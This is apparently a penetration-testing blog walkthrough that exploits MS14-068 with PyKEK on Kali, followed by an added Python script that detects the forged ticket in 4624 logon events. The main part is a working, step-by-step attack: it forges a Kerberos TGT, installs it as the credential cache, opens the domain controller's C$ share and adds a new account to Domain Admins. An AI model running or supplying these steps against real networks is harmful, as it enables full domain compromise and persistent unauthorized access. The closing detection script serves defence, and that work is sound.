Here’s a quick writeup of exploiting MS14-068 using PyKEK and Kali.
Kali Prepwork
Install and Configure Kerberos
Install kerberos:
apt-get install krb5-user krb5-config
Create the relevant Kerberos configuration in /etc/krb5.conf:
[libdefaults]
default_realm = pwn3d.local
[realms]
pwn3d.local = {
kdc = dc1.pwn3d.local
admin_server = dc1.pwn3d.local
default_domain = pwn3d.local
}
Point DNS at the domain controller's DNS server in /etc/resolv.conf so that the Kerberos SRV records (e.g. _kerberos._tcp.*) resolve correctly.
According to the TrustedSec blog, you’ll need to sync time with the domain controller. During my testing I didn’t perform any syncing and had no issues.
Download, Compile and Install Samba
The Kali Samba package is missing many of the Samba tools, including several that are very useful for exploiting MS14-068. The build steps below are based on mubix's blog post "Dumping NTDS.dit Domain Hashes Using Samba".
Download Samba 4.1.0 and the replication only patch.
wget http://ftp.samba.org/pub/samba/stable/samba-4.1.0.tar.gz
wget http://files.securusglobal.com/samba-4.1.0_replication-only-patch.txt
Extract the tarball.
tar zxvf samba-4.1.0.tar.gz
mkdir src
mv samba-4.1.0 src/
Add the replication only patch.
patch -p0 < samba-4.1.0_replication-only-patch.txt
Build and install Samba.
cd src/samba-4.1.0/
./configure
make -j 2 && make install
Exploitation
Determine the user SID:
rpcclient $> lookupnames john.smith
john.smith S-1-5-21-2923581646-3335815371-2872905324-1107 (User: 1)
Supply the SID, the user principal and the domain controller's address to PyKEK's ms14-068.py and the magic happens.
# python ms14-068.py -u john.smith@pwn3d.local -s S-1-5-21-2923581646-3335815371-2872905324-1107 -d 192.168.115.10
Password:
[+] Building AS-REQ for 192.168.115.10... Done!
[+] Sending AS-REQ to 192.168.115.10... Done!
[+] Receiving AS-REP from 192.168.115.10... Done!
[+] Parsing AS-REP from 192.168.115.10... Done!
[+] Building TGS-REQ for 192.168.115.10... Done!
[+] Sending TGS-REQ to 192.168.115.10... Done!
[+] Receiving TGS-REP from 192.168.115.10... Done!
[+] Parsing TGS-REP from 192.168.115.10... Done!
[+] Creating ccache file 'TGT_john.smith@pwn3d.local.ccache'... Done!
Install the forged TGT as your Kerberos credential cache (the default ccache file for your UID).
# mv TGT_john.smith@pwn3d.local.ccache /tmp/krb5cc_$(echo $UID)
PWN!
If all went well, you can now use Kerberos to authenticate.
# smbclient -k -W pwn3d -U john.smith //dc1.pwn3d.local/C$
OS=[Windows Server 2008 R2 Standard 7601 Service Pack 1] Server=[Windows Server 2008 R2 Standard 6.1]
smb: \>
Create a new account and make it a member of the Domain Admins group using the Samba 4 utilities/example code (the same account name is used in both commands).
./user_add dc1.pwn3d.local kerberpwn3d2 Password1 -W pwn3d -U john.smith -k
./group_adduser dc1.pwn3d.local "Domain Admins" kerberpwn3d2 -W pwn3d -U john.smith -k
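From the defender's side, the walkthrough above leaves a trace: the forged TGT carries the realm as PyKEK wrote it, so the domain controller's 4624 logon events for that session can record the Account Domain as the lowercase DNS name (pwn3d.local) instead of the NetBIOS name (PWN3D) that normal Kerberos logons carry. The script below is an added example, not part of the original writeup or of PyKEK, that flags such mismatches over a handful of constructed log records. The key=value record layout, the NETBIOS_NAME/DNS_NAME values and the field names are assumptions made for the example; real events come out of the Security log as XML and would need a different parser.

```python
import re

# Assumptions for this example: the domain's NetBIOS name and DNS name.
NETBIOS_NAME = "PWN3D"
DNS_NAME = "pwn3d.local"

# Constructed sample records (not real event log output). Field names mirror
# the 4624 fields a SIEM typically extracts; the layout is a flat key=value line.
SAMPLE_EVENTS = [
    "EventID=4624 LogonType=3 AccountName=john.smith AccountDomain=PWN3D Workstation=WS01 AuthPackage=Kerberos",
    "EventID=4624 LogonType=3 AccountName=john.smith AccountDomain=pwn3d.local Workstation=- AuthPackage=Kerberos",
    "EventID=4624 LogonType=3 AccountName=svc_backup AccountDomain=PWN3D Workstation=SRV02 AuthPackage=Kerberos",
    "EventID=4624 LogonType=3 AccountName=ANONYMOUS AccountDomain=NT_AUTHORITY Workstation=- AuthPackage=NTLM",
    "EventID=4672 AccountName=john.smith AccountDomain=pwn3d.local",
]


def parse_event(line):
    """Turn one key=value record into a dict (values contain no spaces here)."""
    return dict(re.findall(r"(\w+)=(\S+)", line))


def is_suspicious(event):
    """True for a Kerberos 4624 logon whose Account Domain is the DNS realm
    rather than the NetBIOS domain name."""
    if event.get("EventID") != "4624" or event.get("AuthPackage") != "Kerberos":
        return False
    domain = event.get("AccountDomain", "")
    # A healthy logon carries the NetBIOS name; the DNS realm in this field is
    # the indicator we are hunting for. Compare case-insensitively so an
    # upper-cased FQDN is caught as well.
    return domain != NETBIOS_NAME and domain.lower() == DNS_NAME.lower()


def find_suspicious(lines):
    """Return the parsed records that trip the indicator, in log order."""
    hits = []
    for line in lines:
        event = parse_event(line)
        if is_suspicious(event):
            hits.append(event)
    return hits


if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_EVENTS):
        print("suspicious Kerberos logon:", hit["AccountName"], "from domain", hit["AccountDomain"])
```

Run on the constructed sample, the script flags only the second record (john.smith logging on with AccountDomain=pwn3d.local); the 4672 record with the same domain is ignored because the check is deliberately scoped to 4624 Kerberos logons, where the NetBIOS-versus-DNS distinction is meaningful. On a patched domain controller (KB3011780) the forged ticket is rejected outright, so this check is a compensating detection for hosts that have not yet been patched.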